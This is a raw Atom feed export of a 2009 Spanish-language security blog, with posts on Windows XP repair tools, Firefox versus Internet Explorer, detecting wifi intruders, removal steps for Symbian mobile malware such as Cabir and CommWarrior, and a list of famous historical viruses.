src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mFMUaCwtbag/SrJQb04D0xI/AAAAAAAAABQ/3wVZfVM8iL0/s72-c/cmddh6.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-7220993397741121698</id><published>2009-09-15T17:11:00.000+02:00</published><updated>2009-09-15T17:12:17.343+02:00</updated><title type='text'>Arregla tu Pc sin formatear..... repara xp</title><content type='html'>&lt;strong&gt;Evita formatear tu windows cuando tengas problemas&lt;br /&gt;&lt;br /&gt;Con este rar de tan solo 385 kb podes reparar tu Windows dañado ya sea por virus, spyware ,afines y/o problemas de registro.&lt;br /&gt;1- Una compilacion de archivos reg, vbs para corregir este tipo de errores de registro y de windows en gral.&lt;br /&gt;-Reparar asociacion avi.reg&lt;br /&gt;-Reparar asociacion cab.reg&lt;br /&gt;-Reparar asociacion carpetas.reg&lt;br /&gt;-Reparar asociacion eml.reg&lt;br /&gt;-Reparar asociacion exe.reg&lt;br /&gt;-Reparar asociacion hta.reg&lt;br /&gt;-Reparar asociacion ico.reg&lt;br /&gt;-Reparar asociacion lnk.reg&lt;br /&gt;-Reparar asociacion msi.reg&lt;br /&gt;-Reparar asociacion reg.reg&lt;br /&gt;-Reparar asociacion sys.reg&lt;br /&gt;-Reparar iconos de menu inicio, ayuda .vbs&lt;br /&gt;-Reparar vista previa d imagenes.vbs&lt;br /&gt;-Reparar modo seguro.reg&lt;br /&gt;-Reparar restaura sistema.reg&lt;br /&gt;-Repaar xp thumbnail.exe&lt;br /&gt;&lt;br /&gt;Si tenes otro problemas proba estos 2 programas incluidos en el rar.&lt;br /&gt;2- Regunlocker&lt;br /&gt;# Elimina las restricciones del Sistema&lt;br /&gt;* Reactiva el acceso al registro&lt;br /&gt;* Desbloquea el administrador de tareas&lt;br /&gt;* Desbloquea la consola de Windows&lt;br /&gt;# Elimina las restricciones del Explorador&lt;br /&gt;* Reactiva el botón Ejecutar…&lt;br /&gt;* Reactiva el botón de Apagado e Inicio de Sesión&lt;br /&gt;* Reactiva la Bandeja de Sistema&lt;br /&gt;# Repara la visualización de archivos ocultos&lt;br /&gt;# Libera la página de Inicio de Internet Explorer&lt;br /&gt;# Desbloquea el fondo de pantalla del escritorio de Windows&lt;br /&gt;# Repara el Modo Seguro (Modo a prueba de fallos&lt;br /&gt;&lt;br /&gt;3- Dial-a-fix-v0.60.0.24,&lt;br /&gt;Dial-a-fix. Una sencilla aplicación, gratuita, sin mucho misterio, que&lt;br /&gt;repara aquellas fallas que Windows comienza a tener luego del ataque de&lt;br /&gt;algún malware, virus, una instalación defectuosa o, simplemente, del&lt;br /&gt;uso por parte de nuestra pequeña sobrina. Algunos de estos problemas&lt;br /&gt;podían llegar a requerir la reinstalación del sistema operativo, paso&lt;br /&gt;por demás tedioso y largo, y no lo suficientemente amigable como para&lt;br /&gt;que lo afronte cualquier usuario. Pero con Dial-a-fix de por medio, ya&lt;br /&gt;no.&lt;br /&gt;¿Cómo funciona?&lt;br /&gt;Al descargarlo, nos quedan dos archivos en una carpeta. Ejecutamos&lt;br /&gt;Dial-a-fix.exe para abrirlo; el otro ejecutable lo usa el mismo&lt;br /&gt;programa durante las reparaciones. Ahora, repasemos cada categoría por&lt;br /&gt;separado y expliquemos de qué la van:&lt;br /&gt;1) Prep&lt;br /&gt;La limpieza de temporales nunca está de más, pero no es algo que&lt;br /&gt;solucione nada. En cambio, ajustar la fecha y la hora es necesario para&lt;br /&gt;ciertas páginas de Internet que chequean este dato antes de permitirnos&lt;br /&gt;interactuar con ella.&lt;br /&gt;2) MSI&lt;br /&gt;Nada que ver con la empresa que fabrica componentes de hardware. Esta&lt;br /&gt;sección arregla los conflictos que tengamos con el instalador de&lt;br /&gt;Windows (Windows Installer). Por ejemplo, cuando no se nos permite&lt;br /&gt;instalar nada alegando que no puede tener acceso a él o estamos en&lt;br /&gt;Windows en Modo Seguro (o “A prueba de fallos”, como se suele decir por&lt;br /&gt;tradición).&lt;br /&gt;3) WU / WUAU&lt;br /&gt;Ciertos virus pueden hasta “deshabilitar” ciertas páginas de Internet&lt;br /&gt;para que no podamos ingresar en ellas, como ocurre con el sitio de&lt;br /&gt;actualización y parches de Windows. Este apartado soluciona éstos y&lt;br /&gt;otros problemas relacionados a Windows Update, funcionalidad&lt;br /&gt;imprescindible para mantener el sistema al día.&lt;br /&gt;&lt;br /&gt;4) SSL / HTTPS / Cryptography&lt;br /&gt;Si tenemos inconvenientes a la hora de interactuar con páginas que usen&lt;br /&gt;protocolos de seguridad (SSL o HTTPS), como es el caso de Gmail, desde&lt;br /&gt;aquí quedarán solucionados. Por lo menos, aquellos casos que estén&lt;br /&gt;contemplados por este programa.&lt;br /&gt;5) Registration Center&lt;br /&gt;&lt;br /&gt;Así que el Windows Media Player les tira un error al iniciar? ¿Y qué me&lt;br /&gt;dicen de la función Restaurar Sistema, que no muestra sino una simple&lt;br /&gt;ventana en blanco? Increíble que éstos y muchos otros problemas se&lt;br /&gt;solucionen “registrando” archivos DLL en el sistema. Y éste es el lugar&lt;br /&gt;para hacerlo. No por nada se llama “centro de registración”, ¿eh?.&lt;br /&gt;Una vez tildada la/s categoría/s en la que encaja nuestro problema,&lt;br /&gt;apretamos el botón Go y esperamos que nos muestre la leyenda Ready en&lt;br /&gt;la parte inferior. En el caso del apartado Registration Center, si&lt;br /&gt;tenemos duda sobre cuál de las opciones tildar, tranquilamente podemos&lt;br /&gt;escoger todas. No habrá repercusiones por seleccionar alguna de más.&lt;br /&gt;Adicionalmente, y sólo si nuestro Windows tiene más agujeros que&lt;br /&gt;colador, tenemos el botón con forma de tilde verde, que selecciona&lt;br /&gt;todas las categorías para reparar. La cruz roja, en cambio, elimina&lt;br /&gt;toda selección hecha.&lt;br /&gt;Lo último: el botón Policies muestra una ventana con valores del&lt;br /&gt;Registro que fueron alterados para deshabilitar o no permitir ciertas&lt;br /&gt;acciones o accesos al usuario. Es decir, el programa escanea políticas&lt;br /&gt;de restricciones. Si encuentra alguna, el botón Remove se encargará de&lt;br /&gt;hacer justicia.&lt;br /&gt;Evita formatear tu windows cuando tengas problemas&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.megaupload.com/?d=0RTFBZC1"&gt;descarga:&lt;/a&gt;&lt;br /&gt;&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-7220993397741121698?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/7220993397741121698/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/arregla-tu-pc-sin-formatear-repara-xp.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7220993397741121698'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7220993397741121698'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/arregla-tu-pc-sin-formatear-repara-xp.html' title='Arregla tu Pc sin formatear..... repara xp'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-4379430971089889369</id><published>2009-09-14T12:06:00.000+02:00</published><updated>2009-09-14T12:07:03.849+02:00</updated><title type='text'>21 razones de porqué Firefox es bueno</title><content type='html'>&lt;p&gt;Hay muchas razones para usar &lt;a href="http://www.mozilla-europe.org/es/firefox/"&gt;&lt;strong&gt;Firefox&lt;/strong&gt;&lt;/a&gt; y para decir que es buen navegador. En esta ocasión nos centraremos en enumerar &lt;strong&gt;21 razones por las que Firefox supera a Internet Explorer&lt;/strong&gt;:&lt;/p&gt; &lt;p&gt;&lt;strong&gt;1. No tiene WGA – &lt;/strong&gt;Firefox no comprobará tu Sistema Operativo para saber si usas uno original o no.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;2. Se puede instalan en cualquier sitio – &lt;/strong&gt;si no eres seguidor de Bill Gates, puedes instalar Firefox. ( soportado por linux)&lt;/p&gt; &lt;p&gt;&lt;strong&gt;3. Libre -&lt;/strong&gt; no te costará nada instalarlo, es gratis. Para instalar IE necesitarás una copia genuina del OS.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;4. Utilidad pequeña -&lt;/strong&gt; Grandes caracterí­sticas y funcionalidades  que ocupan poco espacio. (aproximadamente 5 mb)&lt;/p&gt; &lt;p&gt;&lt;strong&gt;5. Funciona en unidades extraibles -&lt;/strong&gt; Firefox no se limita a correr desde donde lo instalas, puedes utilizar &lt;a href="http://www.mozilla.org/support/firefox/tips#oth_usb"&gt;firefox en un disco extraible&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;6. Control total de la instalación -&lt;/strong&gt; puedes detener la instalación brevemente, pararla, y controlar las descargas directas a través de su panel de descargas directas.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;7. Recuperar pestaña cerrada – &lt;/strong&gt;Firefox guarda la pestaña recién cerrada, y puedes recuperarla si la cerraste accidentalmente.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;8. Recuperar sesiones -&lt;/strong&gt; Al iniciar Firefox, puedes recuperar las sesiones anteriores.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;9. El mejor Anti-phishing -&lt;/strong&gt; IE7 y Firefox2 incluyen la caracterí­stica anti-phishing, pero son mejores las de Firefox2. &lt;a href="http://news.yahoo.com/s/nf/20061114/bs_nf/47901"&gt;Ver aquí­…&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;10. Protección contra Spyware -&lt;/strong&gt; Firefox no permitirá que se instale ningún software sin tu consentimiento.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;11. Aislamiento -&lt;/strong&gt; una caracterí­stica muy provechosa de Firefox es que puedes borrar tus datos confidenciales incluyendo lo que escribiste en formularios, historial y otros datos cuando sales de Firefox.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;12. Corrector ortográfico incorporado -&lt;/strong&gt; Firefox tiene un corrector ortográfico incorporado, que comprueba tu E-mail o tu entrada de blog para saber si has cometido errores.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;13. Reportar Phising -&lt;/strong&gt; si encuentras una web falsa (phising), puedes utilizar el navegador firefox para reportarla.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;14. Añade a favoritos todas las pestañas -&lt;/strong&gt; puedes añadir a tus favoritos fácilmente todas las pestañas si están relacionadas unas con otras. Lo mismo puedes abrir a la vez todos los favoritos que estén en la misma carpeta.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;15. El amarillo significa seguro -&lt;/strong&gt; Firefox coloreará de amarillo una dirección URL segura. (IE7 sola muestra un icono de un candado)&lt;/p&gt; &lt;p&gt;&lt;strong&gt;16. Barra inteligente de dirección -&lt;/strong&gt; si escribes accidentalmente tu consulta de búaqueda en la dirección de URL en lugar del cuadro de búsqueda, Firefox inteligente no te devolverá un error, sino que realizará tu consulta dorectamente a Google.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;17. Atajos del ratón -&lt;/strong&gt; aparte de los atajos del teclado, Firefox también tiene atajos para el ratón.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;18. Página Info -&lt;/strong&gt; Firefox incluye una caracterí­stica que puede enseñarte toda la información sobre la página actual.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;19. Enlace al email -&lt;/strong&gt; si deseas enviar un enlace a un amigo, puedes utilizar Firefox para enviar un email a tus amigos, y también puedes incluir algunos comentarios.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;20. Veteranos contra el novato -&lt;/strong&gt; la primera versión del IE se lanzó en agosto de 1995, la primera versión de Opera salió a la luz en 1996, mientras que Firefox se lanzó en septiembre de 2002. Esto significa que Firefox es grande en su juventud.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;21. Open Source-&lt;/strong&gt; El código abierto significa que millones de mentes pueden trabajar juntas para mejorar el navegador.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Artí­culo original:&lt;/strong&gt; &lt;a href="http://smartbro.blogspot.com/2006/11/21-reasons-why-firefox-is-great-beats.html"&gt;21 Reasons Why Firefox Is Great (Beats IE7 Hands Down)&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-4379430971089889369?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/4379430971089889369/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/21-razones-de-porque-firefox-es-bueno.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4379430971089889369'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/4379430971089889369'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/21-razones-de-porque-firefox-es-bueno.html' title='21 razones de porqué Firefox es bueno'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-301110278677950596</id><published>2009-09-14T11:58:00.000+02:00</published><updated>2009-09-14T12:03:22.265+02:00</updated><title type='text'>¿Como detectar quien me piratea la señal wifi?</title><content type='html'>hola, bueno hay un programa que es muy facil de usar , &lt;a href="http://colasoft-mac-scanner.softonic.com/"&gt;Colasoft MAC Scanner&lt;/a&gt;  este programa te permite ver quienes se conetan a tu wifi pero solo eso, os  dejo otro programa que detecta si alguien está utilizando nuestro ancho de banda y, tras ello, enviarle mensajes de alerta para indicarselo e invitarle a que abandone tu preciada red. Puedes descargar &lt;a href="http://air-snare.programas-gratis.net/"&gt;Airsnare&lt;/a&gt;, un programa gratuito para windows que busca la presencia de intrusos inalambricos, informa de quiénes son, muestra su actividad y les envía advertecias.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-301110278677950596?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/301110278677950596/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-detectar-quien-me-piratea-la-senal.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/301110278677950596'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/301110278677950596'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-detectar-quien-me-piratea-la-senal.html' title='¿Como detectar quien me piratea la señal wifi?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-8496656058760518311</id><published>2009-09-11T12:19:00.000+02:00</published><updated>2009-09-11T12:23:08.168+02:00</updated><title type='text'>Virus para Moviles</title><content type='html'>tipo: virus-gusano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cabir es, concretamente, un gusano que utiliza las señales bluetooth, y ya se ha expandido por 20 países. Reduce drásticamente la potencia de los teléfonos infectados, y las variantes más dañinas pueden desactivar el terminal, que debe ser reiniciado en un establecimiento especializado.&lt;br /&gt;&lt;br /&gt;Cabir se propaga en forma de un archivo llamado Caribe.sis, que se instala automáticamente en el sistema cuando el usuario acepta la transmisión,El virus vuelve a ejecutarse desde otra ubicación, y el teléfono es reiniciado. Igualmente, el virus se ejecutará cuando el teléfono sea encendido, y seguirá activo a pesar de que sea borrado del directorio APPS.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;*DESINFECCION:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.&lt;br /&gt;&lt;br /&gt;Luego, buscar en unidades de la A: a la Y: directorios de nombre \System\Apps\Caribe. Una vez encontrado deben ser eliminados los siguientes archivos:&lt;br /&gt;&lt;br /&gt;Caribe.App&lt;br /&gt;Caribe.Rsc&lt;br /&gt;Flo.Mdl&lt;br /&gt;&lt;br /&gt;Buscar también el directorio \System\Symbiansecuredata\Caribesecuritymanager y eliminar allí los archivos:&lt;br /&gt;&lt;br /&gt;Caribe.App&lt;br /&gt;Caribe.Rsc&lt;br /&gt;Caribe.Sis&lt;br /&gt;&lt;br /&gt;Bajo el directorio \System\Recogs eliminar el archivo Flo.Mdl.&lt;br /&gt;&lt;br /&gt;Dado que el archivo Caribe.Rsc no puede ser eliminado mientras se esté ejecutando, se deberán eliminar todos los otros archivos, luego reiniciar el equipo y por último eliminar dicho archivo.&lt;br /&gt;&lt;br /&gt;Finalmente, eliminar el archivo Caribe.Sis del directorio \System\Installs.&lt;br /&gt;--------------------------------------------------------------------------------------&lt;br /&gt;tipo: virus-gusano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este gusano poseé las mismas caracteristicas que el cabir pero puede reproducirse por&lt;br /&gt;SMS, MMS, MMS y mandar datos como texto, videos, imagenes etc.&lt;br /&gt;Es el primer gusano con esta capacidad&lt;br /&gt;&lt;br /&gt;En algunos modelos de teléfonos, el gusano cambia el logo de la operadora telefónica, por uno propio con el siguiente texto:&lt;br /&gt;&lt;br /&gt;Infected by Commwarrior&lt;br /&gt;&lt;br /&gt;El gusano tambien puede abrir una página Web con el navegador del celular&lt;br /&gt;&lt;br /&gt;modelos afectados:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;----Symbian OS Series 60----&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Nokia 3650, 3600&lt;br /&gt;Nokia 3660, 3620&lt;br /&gt;Nokia 6600&lt;br /&gt;Nokia 6620&lt;br /&gt;Nokia 7610&lt;br /&gt;Nokia 7650&lt;br /&gt;Nokia N-Gage&lt;br /&gt;Panasonic X700&lt;br /&gt;Sendo X&lt;br /&gt;Siemens SX1&lt;br /&gt;&lt;br /&gt;&lt;b&gt;*DESINFECCION:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Eliminación manual&lt;br /&gt;&lt;br /&gt;Para eliminar el gusano de un dispositivo infectado, sigue estos pasos:&lt;br /&gt;&lt;br /&gt;1. Selecciona la opción "CommWarrior" de la lista de aplicaciones.&lt;br /&gt;&lt;br /&gt;2. Selecciona "Cancel" (Exit CommWarrior?) y confirma con "Yes".&lt;br /&gt;&lt;br /&gt;3. Borra la carpeta "CommWarrior" utilizando el manejador de archivos (file manager):&lt;br /&gt;&lt;br /&gt;C:\system\apps\CommWarrior\&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aunque el sistema por defecto se instala en la unidad C, esto puede cambiar en algunos casos.&lt;br /&gt;&lt;br /&gt;Si no puedes borrar estos archivos, apaga y vuelva a encender tu dispositivo.&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;tipo: troyano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Doomboot es un troyano que al ejecutarlo automaticamente se descarga el gusano Commwarrior&lt;br /&gt;Doomboot provoca que los teléfonos no se reinicien como debe. Esta diversidad de efectos virales dañan a los usuarios de smartphones de la serie 60 de Symbian, especialmente a los usuarios que utilizan juegos piratas.&lt;br /&gt;&lt;br /&gt;Doomboot provoca que el teléfono no pueda reiniciar y Commwarrior provoca tráfico Bluetooth que hace que el teléfono se quede sin bateria en menos de una hora. Si alguien se infecta de Doomboot tiene menos de una hora para darse cuenta y desinfetcarse, de lo contrario perderá todos sus datos&lt;br /&gt;&lt;br /&gt;Doomboot puede distribuirse de dos formas, por mensajes MMS y por menajes Bluetooth&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;*DESINFECCION:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1. Elimina los siguientes ficheros que localizarás en las ubicaciones indicadas:&lt;br /&gt;&lt;br /&gt;* C:\Etel.dll&lt;br /&gt;* C:\etelmm.dll&lt;br /&gt;* C:\etelpckt.dll&lt;br /&gt;* C:\etelsat.dll&lt;br /&gt;* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.rsc - 0 bytes&lt;br /&gt;* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.MBM - 0 bytes&lt;br /&gt;* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes&lt;br /&gt;* C:\system\apps\Cabir AA detected\Cabir AA detected EVS is disinfecting re-boot your phone.app - 0 bytes&lt;br /&gt;* C:\system\apps\EVS\EVS.aif - 3,245 bytes&lt;br /&gt;* C:\system\apps\EVS\EVS.app - 30,368 bytes&lt;br /&gt;* C:\system\apps\EVS\EVS.rsc - 671 bytes&lt;br /&gt;* C:\system\apps\EVS\EVS_caption.rsc - 60 bytes&lt;br /&gt;* C:\system\apps\EVS\exovirusstop.mbm - 3,961 bytes&lt;br /&gt;* C:\system\apps\velasco\marcos.mdl - 0 bytes&lt;br /&gt;* C:\system\apps\velasco\velasco.app - 0 bytes&lt;br /&gt;* C:\system\apps\velasco\velasco.rsc - 0 bytes&lt;br /&gt;&lt;br /&gt;2. Reinicia tu terminal y explora todo la unidad C: con un antivirus para asegurarte de la eliminación del troyano.&lt;br /&gt;------------------------------------------------------------&lt;br /&gt;tipo: troyano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;Askudoo fecta a dispositivos móviles y opera sobre dispositivos con plataforma Windows CE, J2ME, Symbian, iPhone, Blackberry o Android. Puede ser recibido a través de MMS, vía Bluetooth o descargado a través de páginas web.&lt;br /&gt;&lt;br /&gt;es un troyano diseñado para dispositivos móviles, que llegando bajo una apariencia inofensiva, permite en realidad llevar a cabo intrusiones y ataques contra el mismo.&lt;br /&gt;&lt;br /&gt;Skudoo no se propaga automáticamente por sus propios medios, pero puede ser recibido a través de mensajes MMS, Bluetooth o ser descargado desde sitios web con contenido malicioso.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;" class="bbc_color"&gt;&lt;/span&gt;&lt;/b&gt;-----------------------------------------------&lt;br /&gt;&lt;br /&gt;tipo: troyano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,&lt;br /&gt;induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------&lt;br /&gt;tipo: troyano&lt;br /&gt;so : Symbian&lt;br /&gt;&lt;br /&gt;skulls es un troyano que se camuflagea con el nombre Extended Theme Manager,&lt;br /&gt;induce al usuario a creer que al ejecutarlo podrá crear sus propios temas en su teléfono móvil. Sin embargo, Skulls cambia todos los íconos del teléfono con imágenes de calaveras.&lt;br /&gt;Asimismo, las aplicaciones instaladas en el teléfono no pueden ser usadas una vez que Skulls se ha ejecutado.&lt;br /&gt;Skulls se ha propagado mediante sitios de shareware para teléfonos Symbian.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;*DESINFECCION:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Para remover el gusano de un equipo infectado, se deberá instalar un administrador de archivos y habilitar la opción para ver archivos en el directorio de sistema.&lt;br /&gt;&lt;br /&gt;1. Ir a c:\System\apps\appinst y borrar&lt;br /&gt;c:\System\apps\appinst&lt;br /&gt;c:\System\apps\menu&lt;br /&gt;c:\System\apps\mce&lt;br /&gt;2. Abre el menú de aplicaciones&lt;br /&gt;3. Busca navegador web&lt;br /&gt;4. Descargar F-Secure Mobile Anti-Virus para su dispositivo&lt;br /&gt;&lt;a href="http://www.f-secure.com/wireless/download/" class="bbc_link new_win" target="_blank"&gt;http://www.f-secure.com/wireless/download/&lt;/a&gt;&lt;br /&gt;o con el propio móvil: &lt;a href="http://mobile.f-secure.com/" class="bbc_link new_win" target="_blank"&gt;http://mobile.f-secure.com&lt;/a&gt;&lt;br /&gt;5. Instale F-Secure Mobile Anti-Virus&lt;br /&gt;6. Inicie F-Secure móvil Anti-Virus&lt;br /&gt;7. Analice su dispositivo para eliminar los archivos que se usan para bloquear el sistema de aplicaciones críticas&lt;br /&gt;8. Ir al gestor de aplicaciones&lt;br /&gt;9. Desinstalar "Extended Theme.sis"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-8496656058760518311?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/8496656058760518311/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/virus-para-moviles.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8496656058760518311'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/8496656058760518311'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/virus-para-moviles.html' title='Virus para Moviles'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-7925077452243928655</id><published>2009-09-11T12:13:00.001+02:00</published><updated>2009-09-11T12:13:59.003+02:00</updated><title type='text'>Los virus más peligrosos, famosos, dañinos de la historia</title><content type='html'>&lt;p&gt;&lt;strong&gt;W95/CIH (1998)&lt;/strong&gt;&lt;br /&gt;Es conocido como CIH 1003 y como Chernobyl, su fecha de activación y esta denominación hacen referencia al accidente nuclear en esta central.&lt;br /&gt;Origen: Taiwan.&lt;br /&gt;Daños: Más de 80 millones de dólares, pérdida incalculable de iinformación. Me incluyo en la lista. &lt;img src="http://traviesus.com/wp/wp-includes/images/traviesus/010_sad.gif" class="wp-smiley" /&gt;&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Melissa (1999)&lt;/strong&gt;&lt;br /&gt;Atacó a miles de usuarios y empresas el 26 de Marzo de 1999, después de haber sido esparcido como un documento de MS-Word infectado en un grupo de noticias de Usenet, que conformaban una lista de interés sobre páginas web porno.&lt;br /&gt;Origen: EEUU.&lt;br /&gt;Daños: Entre 300 y 600 millones de dólares en pérdidas sólo en su país de origen.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;I Love you (2000)&lt;/strong&gt;&lt;br /&gt;Fue detectado el Jueves 4 de mayo de 2000 cuando infecto a miles de ordenadores en todo el mundo. Este código ha sido considerado como uno de los más rápidos de todos los tiempos en propagarse e infectar ordenadores.&lt;br /&gt;Origen: Hong Kong.&lt;br /&gt;Daños: De 10 a 15 billones de dólares.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Code Red (2001)&lt;/strong&gt;&lt;br /&gt;Un gusano que aprovecha una vulnerabilidad en un componente del Index Server de Microsoft, ha llegado a comprometer la seguridad de cerca de 30000 servidores Windows en todo el mundo, según reportes de consultoras de seguridad informática.&lt;br /&gt;Origen: Aún no determinado.&lt;br /&gt;Daños: De 10 a 15 billones de dólares.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;SQL Slammer (2002)&lt;/strong&gt;&lt;br /&gt;Infecta principalmente a equipos con Microsoft SQL Server, actualmente es uno de los programas o sistemas más utilizados para realizar tareas&lt;br /&gt;relacionadas con registros y bases de datos.&lt;br /&gt;Origen: Aún no determinado.&lt;br /&gt;Daños: No muy fuerte dado que aparecio un fin de semana.&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Blaster (2003)&lt;/strong&gt;&lt;br /&gt;Atacaba básicamente el sitio de Microsoft. Este gusano se propagó rápidamente a través de computadoras con Windows 2000 y XP.&lt;br /&gt;Origen: EEUU.&lt;br 